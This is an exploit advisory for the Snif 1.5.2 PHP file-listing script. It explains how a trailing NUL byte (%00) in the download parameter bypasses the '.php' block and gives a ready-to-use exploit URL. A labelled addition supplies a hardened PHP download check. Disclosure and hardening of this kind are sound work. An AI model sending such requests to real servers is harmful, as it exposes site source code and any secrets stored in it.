Snif v1.5.2 Any Filetype Download Exploit by h3m4n

--------------------------------------------
-: Snif - "Any Filetype" Download Exploit :-
--------------------------------------------

Script     :   Snif - (Simple And Nice Index File)
Version    :   1.5.2 (possibly lower versions too)
Found By   :   Aodrulez.
Email      :   f3arm3d3ar[at]gmail.com

Vulnerability:
--------------

Some default settings are:

$hiddenFilesWildcards = Array("*.php", "*~");
$allowPHPDownloads = false;

The first option prevents any PHP file
from being listed in the directory listing.
The second one prevents download of files
with a ".php" extension.

Even with these options set, we can still
download PHP files, due to the following
vulnerable code:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if ($_GET["download"]!="") {

 // Raw request value: slashes stripped, then URL-decoded (so %00 becomes a NUL byte)
 $download = stripslashes($_GET["download"]);
 $filename = safeDirectory($path.rawurldecode($download));
 // Refuse the download if the file is missing, hidden, or ends in ".php"
 if (
        !file_exists($filename)
        OR fileIsHidden($filename)
        OR (substr(strtolower($filename), -4)==".php" AND !$allowPHPDownloads)) {
        // (the advisory's excerpt ends here; the rejection branch is not shown)
 }
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
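
The last line in the above code checks the
file's extension to make sure it is not a PHP
file. This line of code is vulnerable, though:
it compares only the last four characters of
the requested name, so a name that ends in a
NUL byte (%00) no longer ends in ".php", while
PHP versions before 5.3.4 cut the path at that
NUL byte when passing it to the filesystem.
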
Exploit:
--------

Let's say the script is located here:
http://www.a.com/snif.php

The following URL will bypass all restrictions
and let you download a PHP file:


Aodrulez                                                                                   02/01/2010
http://www.a.com/snif.php?download=snif.php%00

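A hardened form of the download check, as an added example that is not Snif's code or the advisory author's: it rejects NUL and other control bytes first, then applies the hidden-file wildcards and the PHP rule to the resolved path. The function name isDownloadAllowed, its parameters, and the scratch directory are hypothetical; it assumes PHP 7 or later and goes slightly beyond the advisory by also confirming the resolved file stays inside the served directory.

```php
<?php
// Added example; not Snif's code. Names below are hypothetical.
function isDownloadAllowed(string $baseDir, string $requested,
                           array $hiddenWildcards, bool $allowPHPDownloads): bool
{
    // Reject NUL and other control bytes before any other check. A trailing
    // NUL is what makes "snif.php\0" fail the substr(..., -4) == ".php" test.
    if (preg_match('/[\x00-\x1f\x7f]/', $requested)) {
        return false;
    }
    // Resolve to a canonical path and decide only on that resolved value.
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $real === false || !is_file($real)) {
        return false;
    }
    // The resolved file must still live under the served directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    // Apply the hidden-file wildcards and the PHP rule to the resolved name.
    $name = strtolower(basename($real));
    foreach ($hiddenWildcards as $pattern) {
        if (fnmatch(strtolower($pattern), $name)) {
            return false;
        }
    }
    $isPhp = pathinfo($name, PATHINFO_EXTENSION) === 'php';
    return !($isPhp && !$allowPHPDownloads);
}

// Constructed demo: a scratch directory holding one PHP file and one text file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'snif_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/snif.php', '<?php // placeholder');
file_put_contents($dir . '/readme.txt', 'hello');

$hidden = ['*.php', '*~'];   // default wildcards quoted in the advisory
$cases  = ['readme.txt', 'snif.php', rawurldecode('snif.php%00'), '../readme.txt'];
foreach ($cases as $c) {
    $verdict = isDownloadAllowed($dir, $c, $hidden, false) ? 'allow' : 'deny';
    printf("%-20s %s\n", json_encode($c), $verdict);
}
unlink($dir . '/snif.php');
unlink($dir . '/readme.txt');
rmdir($dir);
```
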
Greetz Fly Out To
-----------------

Amforked()            : My Mentor.
The Blue Genius       : My Boss.
www.orchidseven.com
www.isac.org.in



